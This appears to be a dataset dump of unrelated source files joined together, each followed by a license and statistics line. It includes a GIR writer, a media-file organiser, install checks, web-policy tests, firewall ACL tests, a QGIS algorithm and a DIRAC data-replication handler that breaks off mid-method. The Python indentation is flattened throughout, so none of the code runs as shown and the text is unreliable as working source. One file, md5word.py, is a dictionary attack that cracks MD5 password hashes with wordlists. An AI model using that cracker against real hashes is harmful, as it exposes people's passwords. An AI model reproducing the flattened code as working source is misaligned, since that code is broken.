def _write_vfunc(self, vf):
attrs = []
if vf.invoker:
attrs.append(('invoker', vf.invoker))
self._write_callable(vf, 'virtual-method', attrs)
def _write_callback(self, callback):
attrs = []
if callback.namespace:
attrs.append(('c:type', callback.ctype or callback.c_name))
self._write_callable(callback, 'callback', attrs)
def _write_record(self, record, extra_attrs=[]):
is_gtype_struct = False
attrs = list(extra_attrs)
if record.name is not None:
attrs.append(('name', record.name))
if record.ctype is not None: # the record might be anonymous
attrs.append(('c:type', record.ctype))
if record.disguised:
attrs.append(('disguised', '1'))
if record.foreign:
attrs.append(('foreign', '1'))
if record.is_gtype_struct_for is not None:
is_gtype_struct = True
attrs.append(('glib:is-gtype-struct-for',
self._type_to_name(record.is_gtype_struct_for)))
self._append_version(record, attrs)
self._append_node_generic(record, attrs)
self._append_registered(record, attrs)
if record.c_symbol_prefix:
attrs.append(('c:symbol-prefix', record.c_symbol_prefix))
with self.tagcontext('record', attrs):
self._write_generic(record)
if record.fields:
for field in record.fields:
self._write_field(field, is_gtype_struct)
for method in sorted(record.constructors):
self._write_constructor(method)
for method in sorted(record.methods):
self._write_method(method)
for method in sorted(record.static_methods):
self._write_static_method(method)
def _write_union(self, union):
attrs = []
if union.name is not None:
attrs.append(('name', union.name))
if union.ctype is not None: # the union might be anonymous
attrs.append(('c:type', union.ctype))
self._append_version(union, attrs)
self._append_node_generic(union, attrs)
self._append_registered(union, attrs)
if union.c_symbol_prefix:
attrs.append(('c:symbol-prefix', union.c_symbol_prefix))
with self.tagcontext('union', attrs):
self._write_generic(union)
if union.fields:
for field in union.fields:
self._write_field(field)
for method in sorted(union.constructors):
self._write_constructor(method)
for method in sorted(union.methods):
self._write_method(method)
for method in sorted(union.static_methods):
self._write_static_method(method)
def _write_field(self, field, is_gtype_struct=False):
if field.anonymous_node:
if isinstance(field.anonymous_node, ast.Callback):
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
with self.tagcontext('field', attrs):
self._write_callback(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Record):
self._write_record(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Union):
self._write_union(field.anonymous_node)
else:
raise AssertionError("Unknown field anonymous: %r" \
% (field.anonymous_node, ))
else:
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
# Fields are assumed to be read-only
# (see also girparser.c and generate.c)
if not field.readable:
attrs.append(('readable', '0'))
if field.writable:
attrs.append(('writable', '1'))
if field.bits:
attrs.append(('bits', str(field.bits)))
if field.private:
attrs.append(('private', '1'))
with self.tagcontext('field', attrs):
self._write_generic(field)
self._write_type(field.type)
def _write_signal(self, signal):
attrs = [('name', signal.name)]
self._append_version(signal, attrs)
self._append_node_generic(signal, attrs)
with self.tagcontext('glib:signal', attrs):
self._write_generic(signal)
self._write_return_type(signal.retval)
self._write_parameters(signal, signal.parameters)
| gpl-2.0 | 7,605,723,460,842,861,000 | 41.477718 | 99 | 0.565883 | false |
PlainStupid/PlainCleanUp | CleanUp/FinalSol.py | 1 | 9335 | import re
import os
import shutil
import sys
# Regexes are in from most used to least used regex for
# a given file pattern.
regexShow = [
'''
# Matches with Show.S01E10.mp4
^ #Beginning of a string
(?P<ShowName>.+?) #Show name
[\.\_\-\s]+ #If it has dot, underscore or dash
(?:s\s*|season\s*) #Case if starts with s or season
(?P<SeasonNumber>\d+) #Show Season number
[. _-]*
(?:e\s*|episode\s*) #Case if starts with e or episode
(?P<EpisodeNumber>\d+) #Show episode number
[. _-]*
''',
'''
# Matches Show.Name -12x12.avi
^
(?P<ShowName>.+)
#Show name
[._-]+ # char between show name and season number
(?P<SeasonNumber>\d+)
#Season number
x #x between season and episode number
(?P<EpisodeNumber>\d+)
#Episode number
''',
'''
# Matches Show - [01x10].mp4
^
(?P<ShowName>.+)
\s*[-]*\s*\[
(?P<SeasonNumber>\d+) #Season number
x
(?P<EpisodeNumber>\d+)#Episode number
]
''',
'''
# Matches Show.Name.812.mp4
^
(?P<ShowName>.+?)
[. _-]+
(?P<SeasonNumber>\d{1,2}) #Season number
(?P<EpisodeNumber>\d{2}) #Episode number
''',
'''
# Matches with Show03e10.mp4
# eg. santi-dexterd07e10.hdrip.xvid
^(?P<ShowName>.{2,}) #Show name
(?P<SeasonNumber>\d.+) #Season number
(?:e|episode)(?P<EpisodeNumber>\d+) #Episode number
'''
]
ignoreRegex = {'sample': '(^|[\W_])(sample\d*)[\W_]',
'photos': '^AlbumArt.+{.+}'}
videoextensions = [ 'avi', 'mp4', 'mkv', 'mpg', '.mp3',
'm4v', 'divx', 'rm', 'mpeg', 'wmv',
'ogm', 'iso', 'img', 'm2ts', 'ts',
'flv', 'f4v', 'mov', 'rmvb', 'vob',
'dvr-ms', 'wtv', 'ogv', '3gp', 'xvid'
]
subExtensions = ['srt', 'idx' 'sub']
otherExtension = ['nfo']
photoExtensions = ['jpg', 'jpeg', 'bmp', 'tbn']
junkFiles = ['.torrent', '.dat', '.url', '.txt', '.sfv']
showsFolder = 'Shows'
def cleanUp(dirty_dir, clean_dir):
# Absolute path to the dirty directory
dirtyDir = os.path.abspath(dirty_dir)
# Absolute path to the clean directory
cleanDir = os.path.abspath(clean_dir)
theShowDir = os.path.join(cleanDir, showsFolder)
for subdir, dirs, files in os.walk(dirtyDir):
# Scan every file in dirtyDir
for file in files:
# Get the file name and its extension
file_name, file_extension = os.path.splitext(file)
# Absolute path to the old file
oldFile = os.path.abspath(os.path.join(subdir, file))
# Run through every regular expression, from best match to least match
for y in regexShow:
# First we compile the regular expression
showReg = re.compile(y, re.IGNORECASE | re.MULTILINE | re.VERBOSE)
# Get the show name if it exists
showName = showReg.match(file)
# We don't want sample files so we check if the current file is
# a sample file
isSample = re.search(ignoreRegex['sample'], file)
#
ignPhotos = re.match(ignoreRegex['photos'], file)
# Check the shows files based on their extension and if they are not
# a sample file
if showName and not isSample and allowedExt(file_extension):
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Check the photos since we don't want all photos, eg. AlbumArt_....
if showName and not isSample and not ignPhotos and file_extension[1:] in photoExtensions:
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Remove the file if it has junk extension
if file_extension in junkFiles:
if os.path.exists(oldFile):
os.remove(oldFile)
# Go and clean the dirty folder, that is remove all empty folders
cleanEmptyDirtyDir(dirtyDir)
# Give the user a satisfying word
print('Done')
def cleanEmptyDirtyDir(dirtyDir):
# get number of subdirectories
curr = len([x[0] for x in os.walk(dirtyDir)])
while True:
# remove all empty dirs
remove_all_empty_dirs(dirtyDir)
temp = len([x[0] for x in os.walk(dirtyDir)])
# if no empty directory was found we stop
if curr == temp:
break
curr = temp
def allowedExt(file_extension):
"""
:argument File extension
:returns Returns true if the file extension is in current extensions groups
"""
# Get the file extension without the dot
fileExt = file_extension[1:]
# Return True if it exist in extensions groups
return (fileExt in subExtensions or
fileExt in videoextensions or
fileExt in otherExtension)
def cleanShowName(file):
"""
:argument Original file name(string)
:returns Returns clean show name, eg. Show Name
"""
return re.sub('\.|-|_', ' ', file.group('ShowName')).strip().title()
def dottedShowName(file):
"""
:argument Original file name(string)
:returns Returns dotted show name, eg. Show.Name
"""
return re.sub('-|_|\s', '.', file.group('ShowName')).strip().title()
def mkFullMovieDir(fullDir, newfile):
movieName = newfile.group('MovieName')
movieYear = newfile.group('MovieYear')
pathName = '%s (%s)' % (movieName, movieYear)
newPath = os.path.join(fullDir, pathName)
if not os.path.isdir(newPath):
if os.path.isfile(newPath):
raise OSError('A file with the same name as the folder already exist: %s' % (newPath))
else:
try:
os.makedirs(newPath)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (newPath))
pass
def moveTvFile(clean_dir, oldFile, newFile):
"""
:argument Path to the clean directory, old file including its path, regex file
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(newFile)
# And the season number
seasonNumber = int(newFile.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Get the base name of the old file - ./dirty/Seasn9/TheFileS##E##.avi -> TheFileS##E##.avi
oldFileName = os.path.basename(oldFile)
# New file path to the clean folder - ./clean/Show Name/Season ##/TheFile.avi
newFilePath = os.path.join(fullDir, oldFileName)
# If it doesn't exist we rename it, otherwise just notify user about it
if not os.path.isfile(newFilePath):
shutil.move(oldFile, newFilePath)
else:
print('The old file exist in new path:',oldFile)
pass
def mkFullShowDir(clean_dir, file):
"""
:argument Original file name(string)
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(file)
# And the season number
seasonNumber = int(file.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Create the folder if it doesn't exist, raise error if there is a file
# with the same name
if not os.path.isdir(fullDir):
if os.path.isfile(fullDir):
raise OSError('A file with the same name as the folder already exist: %s' % (fullDir))
else:
try:
os.makedirs(fullDir)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (fullDir))
pass
def remove_all_empty_dirs(path_to_curr_dir):
"""
:argument Path to dirty directory
:returns Nothing
"""
# check if path exists
if not os.path.isdir(path_to_curr_dir):
return
# get all items in the current directory
items = os.listdir(path_to_curr_dir)
# if directory is not empty, we call recursively for each item
if items:
for item in items:
abs_path = os.path.join(path_to_curr_dir, item)
remove_all_empty_dirs(abs_path)
# Empty folder removed
else:
os.rmdir(path_to_curr_dir)
if __name__ == "__main__":
cleanUp(sys.argv[1], sys.argv[2]) | mit | 6,587,270,393,259,099,000 | 30.12 | 105 | 0.582217 | false |
jjdmol/LOFAR | CEP/GSM/bremen/validate_install.py | 1 | 1521 | #!/usr/bin/python
"""
Script to check if the required modules are installed.
"""
class BColors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def _test_import(libname):
"""
Try importing the library.
"""
try:
__import__(libname)
return True
except ImportError:
return False
def getOk(ok=True):
"""
Get the coloured "OK"/"FAILED" line.
"""
if ok:
return '%s OK %s' % (BColors.OKGREEN, BColors.ENDC)
else:
return '%s FAILED %s' % (BColors.FAIL, BColors.ENDC)
OK_STR = { True: 'OK', False: 'FAILED' }
def test_import(libname):
"""
Test if a module libname is available.
"""
print 'Module %s ... %s' % (libname, getOk(_test_import(libname)))
def test_import_alternative(lib1, lib2):
"""
Test if either of lib1/lib2 is available.
"""
b1 = _test_import(lib1)
b2 = _test_import(lib2)
print '%s %s / %s %s ... %s' % (lib1, OK_STR[b1], lib2, OK_STR[b2], getOk(b2 or b1))
def print_head(name):
"""
Print a fancy title.
"""
print BColors.HEADER, '='*10, name, '='*10, BColors.ENDC
print_head('CRITICAL')
test_import('pysvn')
test_import_alternative('monetdb', 'psycopg2')
test_import('numpy')
test_import('healpy')
test_import_alternative('configobj', 'lofar.parameterset')
print_head('API')
test_import('texttable')
print_head('Tests')
test_import('nose')
test_import('testconfig')
| gpl-3.0 | -5,944,344,756,564,354,000 | 19.28 | 88 | 0.593031 | false |
GillesArcas/numsed | numsed/common.py | 1 | 2941 | from __future__ import print_function
import sys
import os
import subprocess
import time
try:
from StringIO import StringIO # Python2
except ImportError:
from io import StringIO # Python3
PY2 = sys.version_info < (3,)
PY3 = sys.version_info > (3,)
TMP_SED = 'tmp.sed'
TMP_INPUT = 'tmp.input'
TMP_PY = 'tmp.py'
class NumsedConversion:
def __init__(self, source, transformation):
self.source = source
self.transformation = transformation
def trace(self):
return ''
def run(self, verbose=True):
return ''
def coverage(self):
return 'Coverage not implemented for current conversion.'
class ListStream:
def __enter__(self):
self.result = StringIO()
sys.stdout = self.result
return self
def __exit__(self, ext_type, exc_value, traceback):
sys.stdout = sys.__stdout__
def stringlist(self):
return self.result.getvalue().splitlines()
def singlestring(self):
return self.result.getvalue()
def run(cmd, echo=True):
try:
p = subprocess.Popen(cmd.split(),
#shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except:
print('Unable to start', cmd)
exit(1)
res = []
while True:
line = p.stdout.readline()
line = line.decode('ascii') # py3
if line == '':
break
else:
line = line.rstrip('\n\r')
res.append(line)
if echo:
print(line)
return '\n'.join(res)
def testlines(name):
'''
yield each test in a test suite
'''
lines = []
result = None
dest = lines
with open(name) as f:
for line in f:
if line.startswith('#') and '===' in line:
result = []
dest = result
elif line.startswith('#') and '---' in line:
yield lines, result
lines = []
result = None
dest = lines
else:
dest.append(line)
def list_compare(tag1, tag2, list1, list2):
# make sure both lists have same length
maxlen = max(len(list1), len(list2))
list1.extend([''] * (maxlen - len(list1)))
list2.extend([''] * (maxlen - len(list2)))
# with open('list1.txt', 'w') as f:
# for line in list1:
# print>>f, line
# with open('list2.txt', 'w') as f:
# for line in list2:
# print>>f, line
diff = list()
res = True
for i, (x, y) in enumerate(zip(list1, list2)):
if x != y:
diff.append('line %s %d: %s' % (tag1, i + 1, x))
diff.append('line %s %d: %s' % (tag2, i + 1, y))
res = False
return res, diff
def hasextension(filename, *ext):
return os.path.splitext(filename)[1].lower() in [_.lower() for _ in ext]
| mit | 6,023,549,609,253,550,000 | 23.923729 | 76 | 0.524651 | false |
dstufft/warehouse | tests/unit/test_policy.py | 1 | 2168 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pretend
from warehouse import policy
def test_markdown_view(tmpdir):
tmpdir = str(tmpdir)
filename = "test.md"
with open(os.path.join(tmpdir, filename), "w", encoding="utf8") as fp:
fp.write("# This is my Test\n\nIt is a great test.\n")
view = policy.markdown_view_factory(filename=filename)
request = pretend.stub(registry=pretend.stub(settings={"policy.directory": tmpdir}))
result = view(request)
assert result == {
"title": "This is my Test",
"html": "<h1>This is my Test</h1>\n<p>It is a great test.</p>\n",
}
def test_add_policy_view(monkeypatch):
md_view = pretend.stub()
markdown_view_factory = pretend.call_recorder(lambda filename: md_view)
monkeypatch.setattr(policy, "markdown_view_factory", markdown_view_factory)
config = pretend.stub(
add_route=pretend.call_recorder(lambda *a, **kw: None),
add_view=pretend.call_recorder(lambda *a, **kw: None),
)
policy.add_policy_view(config, "my-policy", "mine.md")
assert config.add_route.calls == [
pretend.call("policy.my-policy", "/policy/my-policy/")
]
assert config.add_view.calls == [
pretend.call(md_view, route_name="policy.my-policy", renderer="policy.html")
]
assert markdown_view_factory.calls == [pretend.call(filename="mine.md")]
def test_includeme():
config = pretend.stub(add_directive=pretend.call_recorder(lambda *a, **kw: None))
policy.includeme(config)
assert config.add_directive.calls == [
pretend.call("add_policy", policy.add_policy_view, action_wrap=False)
]
| apache-2.0 | -2,289,942,341,886,902,800 | 31.358209 | 88 | 0.683118 | false |
knightmare2600/d4rkc0de | encryption/md5word.py | 1 | 1132 | #!/usr/bin/python
#Uses all wordlists in a dir to crack a hash.
#
#www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import md5, sys, os, time
def getwords(wordlist):
try:
file = open(wordlist, "r")
words = file.readlines()
file.close()
except(IOError),msg:
words = ""
print "Error:",msg
pass
return words
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) != 3:
print "Usage: ./md5word.py <hash> <wordlist dir>"
sys.exit(1)
pw = sys.argv[1]
wordlists = os.listdir(sys.argv[2])
print "\n d3hydr8[at]gmail[dot]com md5word v1.0"
print "-----------------------------------------"
print "\n[+] Hash:",pw
print "[+] Wordlists Loaded:",len(wordlists)
print "[+] Started:",timer(),"\n"
for lst in wordlists:
words = getwords(os.path.join(sys.argv[2],lst))
print "[+] List:",lst," Length:",len(words),"loaded"
for word in words:
hash = md5.new(word[:-1]).hexdigest()
if pw == hash:
print "\n[+] Found Password:",os.path.join(sys.argv[2],lst)
print "[!] Password is:",word
print "\n[+] Done:",timer()
sys.exit(1)
print "\n[+] Done:",timer()
| gpl-2.0 | 3,432,820,828,723,467,000 | 19.581818 | 62 | 0.605124 | false |
google/capirca | tests/lib/windows_test.py | 1 | 4977 | # Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittest for windows acl rendering module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from capirca.lib import naming
from capirca.lib import policy
from capirca.lib import windows
import mock
GOOD_HEADER = """
header {
comment:: "this is a test acl"
target:: windows test-filter
}
"""
MULTIPLE_PROTOCOLS_TERM = """
term multi-proto {
protocol:: tcp udp icmp
action:: accept
}
"""
GOOD_WARNING_TERM = """
term good-warning-term {
protocol:: tcp udp icmp
policer:: batman
action:: accept
}
"""
GOOD_TERM = """
term good-term {
source-port:: FOO
destination-port:: BAR
protocol:: tcp
action:: accept
}
"""
TCP_ESTABLISHED_TERM = """
term tcp-established {
source-port:: FOO
destination-port:: BAR
protocol:: tcp
option:: tcp-established
action:: accept
}
"""
UDP_ESTABLISHED_TERM = """
term udp-established-term {
source-port:: FOO
destination-port:: BAR
protocol:: udp
option:: established
action:: accept
}
"""
SUPPORTED_TOKENS = {
'action',
'comment',
'destination_address',
'destination_address_exclude',
'destination_port',
'expiration',
'icmp_type',
'stateless_reply',
'name',
'option',
'platform',
'platform_exclude',
'protocol',
'source_address',
'source_address_exclude',
'source_port',
'translated',
}
SUPPORTED_SUB_TOKENS = {
'action': {'accept', 'deny'},
'icmp_type': {
'alternate-address',
'certification-path-advertisement',
'certification-path-solicitation',
'conversion-error',
'destination-unreachable',
'echo-reply',
'echo-request', 'mobile-redirect',
'home-agent-address-discovery-reply',
'home-agent-address-discovery-request',
'icmp-node-information-query',
'icmp-node-information-response',
'information-request',
'inverse-neighbor-discovery-advertisement',
'inverse-neighbor-discovery-solicitation',
'mask-reply',
'mask-request', 'information-reply',
'mobile-prefix-advertisement',
'mobile-prefix-solicitation',
'multicast-listener-done',
'multicast-listener-query',
'multicast-listener-report',
'multicast-router-advertisement',
'multicast-router-solicitation',
'multicast-router-termination',
'neighbor-advertisement',
'neighbor-solicit',
'packet-too-big',
'parameter-problem',
'redirect',
'redirect-message',
'router-advertisement',
'router-renumbering',
'router-solicit',
'router-solicitation',
'source-quench',
'time-exceeded',
'timestamp-reply',
'timestamp-request',
'unreachable',
'version-2-multicast-listener-report',
},
}
# Print a info message when a term is set to expire in that many weeks.
# This is normally passed from command line.
EXP_INFO = 2
class WindowsGeneratorTest(unittest.TestCase):
def setUp(self):
super(WindowsGeneratorTest, self).setUp()
self.naming = mock.create_autospec(naming.Naming)
def testBuildTokens(self):
pol1 = windows.WindowsGenerator(
policy.ParsePolicy(GOOD_HEADER + MULTIPLE_PROTOCOLS_TERM, self.naming),
EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEqual(st, SUPPORTED_TOKENS)
self.assertEqual(sst, SUPPORTED_SUB_TOKENS)
def testBuildWarningTokens(self):
pol1 = windows.WindowsGenerator(policy.ParsePolicy(
GOOD_HEADER + GOOD_WARNING_TERM, self.naming), EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEqual(st, SUPPORTED_TOKENS)
self.assertEqual(sst, SUPPORTED_SUB_TOKENS)
def testSkipEstablished(self):
# self.naming.GetNetAddr.return_value = _IPSET
self.naming.GetServiceByProto.return_value = ['123']
pol = windows.WindowsGenerator(policy.ParsePolicy(
GOOD_HEADER + TCP_ESTABLISHED_TERM + GOOD_TERM, self.naming), EXP_INFO)
self.assertEqual(len(pol.windows_policies[0][4]), 1)
pol = windows.WindowsGenerator(policy.ParsePolicy(
GOOD_HEADER + UDP_ESTABLISHED_TERM + GOOD_TERM, self.naming), EXP_INFO)
self.assertEqual(len(pol.windows_policies[0][4]), 1)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -2,680,503,843,350,668,000 | 25.902703 | 79 | 0.666064 | false |
gioman/QGIS | python/plugins/processing/algs/qgis/SinglePartsToMultiparts.py | 1 | 4039 | # -*- coding: utf-8 -*-
"""
***************************************************************************
SinglePartsToMultiparts.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.PyQt.QtGui import QIcon
from qgis.core import QgsFeature, QgsGeometry, QgsWkbTypes, QgsProcessingUtils, NULL
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class SinglePartsToMultiparts(GeoAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OUTPUT = 'OUTPUT'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'ftools', 'single_to_multi.png'))
def group(self):
return self.tr('Vector geometry tools')
def name(self):
return 'singlepartstomultipart'
def displayName(self):
return self.tr('Singleparts to multipart')
def defineCharacteristics(self):
self.addParameter(ParameterVector(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterTableField(self.FIELD,
self.tr('Unique ID field'), self.INPUT))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Multipart')))
def processAlgorithm(self, context, feedback):
layer = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.INPUT), context)
fieldName = self.getParameterValue(self.FIELD)
geomType = QgsWkbTypes.multiType(layer.wkbType())
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(layer.fields(), geomType, layer.crs(),
context)
outFeat = QgsFeature()
inGeom = QgsGeometry()
index = layer.fields().lookupField(fieldName)
collection_geom = {}
collection_attrs = {}
features = QgsProcessingUtils.getFeatures(layer, context)
total = 100.0 / QgsProcessingUtils.featureCount(layer, context)
for current, feature in enumerate(features):
atMap = feature.attributes()
idVar = atMap[index]
if idVar in [None, NULL]:
outFeat.setAttributes(atMap)
outFeat.setGeometry(feature.geometry())
writer.addFeature(outFeat)
feedback.setProgress(int(current * total))
continue
key = str(idVar).strip()
if key not in collection_geom:
collection_geom[key] = []
collection_attrs[key] = atMap
inGeom = feature.geometry()
collection_geom[key].append(inGeom)
feedback.setProgress(int(current * total))
for key, geoms in collection_geom.items():
outFeat.setAttributes(collection_attrs[key])
outFeat.setGeometry(QgsGeometry.collectGeometry(geoms))
writer.addFeature(outFeat)
del writer
| gpl-2.0 | 3,639,953,806,379,038,000 | 35.0625 | 107 | 0.564001 | false |
arrabito/DIRAC | DataManagementSystem/Agent/RequestOperations/ReplicateAndRegister.py | 1 | 28823 | ########################################################################
# File: ReplicateAndRegister.py
# Author: [email protected]
# Date: 2013/03/13 18:49:12
########################################################################
""" :mod: ReplicateAndRegister
==========================
.. module: ReplicateAndRegister
:synopsis: ReplicateAndRegister operation handler
.. moduleauthor:: [email protected]
ReplicateAndRegister operation handler
"""
__RCSID__ = "$Id$"
# #
# @file ReplicateAndRegister.py
# @author [email protected]
# @date 2013/03/13 18:49:28
# @brief Definition of ReplicateAndRegister class.
# # imports
import re
from collections import defaultdict
# # from DIRAC
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.Adler import compareAdler, hexAdlerToInt, intAdlerToHex
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.DataManagementSystem.Agent.RequestOperations.DMSRequestOperationsBase import DMSRequestOperationsBase
from DIRAC.Resources.Storage.StorageElement import StorageElement
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.DataManagementSystem.Client.FTS3Operation import FTS3TransferOperation
from DIRAC.DataManagementSystem.Client.FTS3File import FTS3File
from DIRAC.DataManagementSystem.Client.FTS3Client import FTS3Client
from DIRAC.ConfigurationSystem.Client.Helpers import Registry
from DIRAC.DataManagementSystem.Client.FTSClient import FTSClient
def filterReplicas(opFile, logger=None, dataManager=None):
""" filter out banned/invalid source SEs """
if logger is None:
logger = gLogger
if dataManager is None:
dataManager = DataManager()
log = logger.getSubLogger("filterReplicas")
result = defaultdict(list)
replicas = dataManager.getActiveReplicas(opFile.LFN, getUrl=False)
if not replicas["OK"]:
log.error('Failed to get active replicas', replicas["Message"])
return replicas
reNotExists = re.compile(r".*such file.*")
replicas = replicas["Value"]
failed = replicas["Failed"].get(opFile.LFN, "")
if reNotExists.match(failed.lower()):
opFile.Status = "Failed"
opFile.Error = failed
return S_ERROR(failed)
replicas = replicas["Successful"].get(opFile.LFN, {})
noReplicas = False
if not replicas:
allReplicas = dataManager.getReplicas(opFile.LFN, getUrl=False)
if allReplicas['OK']:
allReplicas = allReplicas['Value']['Successful'].get(opFile.LFN, {})
if not allReplicas:
result['NoReplicas'].append(None)
noReplicas = True
else:
# There are replicas but we cannot get metadata because the replica is not active
result['NoActiveReplicas'] += list(allReplicas)
log.verbose("File has no%s replica in File Catalog" % ('' if noReplicas else ' active'), opFile.LFN)
else:
return allReplicas
if not opFile.Checksum or hexAdlerToInt(opFile.Checksum) is False:
# Set Checksum to FC checksum if not set in the request
fcMetadata = FileCatalog().getFileMetadata(opFile.LFN)
fcChecksum = fcMetadata.get(
'Value',
{}).get(
'Successful',
{}).get(
opFile.LFN,
{}).get('Checksum')
# Replace opFile.Checksum if it doesn't match a valid FC checksum
if fcChecksum:
if hexAdlerToInt(fcChecksum) is not False:
opFile.Checksum = fcChecksum
opFile.ChecksumType = fcMetadata['Value']['Successful'][opFile.LFN].get('ChecksumType', 'Adler32')
else:
opFile.Checksum = None
# If no replica was found, return what we collected as information
if not replicas:
return S_OK(result)
for repSEName in replicas:
repSEMetadata = StorageElement(repSEName).getFileMetadata(opFile.LFN)
error = repSEMetadata.get('Message', repSEMetadata.get('Value', {}).get('Failed', {}).get(opFile.LFN))
if error:
log.warn('unable to get metadata at %s for %s' % (repSEName, opFile.LFN), error.replace('\n', ''))
if 'File does not exist' in error:
result['NoReplicas'].append(repSEName)
else:
result["NoMetadata"].append(repSEName)
elif not noReplicas:
repSEMetadata = repSEMetadata['Value']['Successful'][opFile.LFN]
seChecksum = hexAdlerToInt(repSEMetadata.get("Checksum"))
# As from here seChecksum is an integer or False, not a hex string!
if seChecksum is False and opFile.Checksum:
result['NoMetadata'].append(repSEName)
elif not seChecksum and opFile.Checksum:
opFile.Checksum = None
opFile.ChecksumType = None
elif seChecksum and (not opFile.Checksum or opFile.Checksum == 'False'):
# Use the SE checksum (convert to hex) and force type to be Adler32
opFile.Checksum = intAdlerToHex(seChecksum)
opFile.ChecksumType = 'Adler32'
if not opFile.Checksum or not seChecksum or compareAdler(
intAdlerToHex(seChecksum), opFile.Checksum):
# # All checksums are OK
result["Valid"].append(repSEName)
else:
log.warn(" %s checksum mismatch, FC: '%s' @%s: '%s'" %
(opFile.LFN, opFile.Checksum, repSEName, intAdlerToHex(seChecksum)))
result["Bad"].append(repSEName)
else:
# If a replica was found somewhere, don't set the file as no replicas
result['NoReplicas'] = []
return S_OK(result)
########################################################################
class ReplicateAndRegister(DMSRequestOperationsBase):
"""
.. class:: ReplicateAndRegister
ReplicateAndRegister operation handler
"""
def __init__(self, operation=None, csPath=None):
"""c'tor
:param self: self reference
:param Operation operation: Operation instance
:param str csPath: CS path for this handler
"""
super(ReplicateAndRegister, self).__init__(operation, csPath)
# # own gMonitor stuff for files
gMonitor.registerActivity("ReplicateAndRegisterAtt", "Replicate and register attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateOK", "Replications successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateFail", "Replications failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterOK", "Registrations successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterFail", "Registrations failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # for FTS
gMonitor.registerActivity("FTSScheduleAtt", "Files schedule attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleOK", "File schedule successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleFail", "File schedule failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # SE cache
# Clients
self.fc = FileCatalog()
def __call__(self):
""" call me maybe """
# # check replicas first
checkReplicas = self.__checkReplicas()
if not checkReplicas["OK"]:
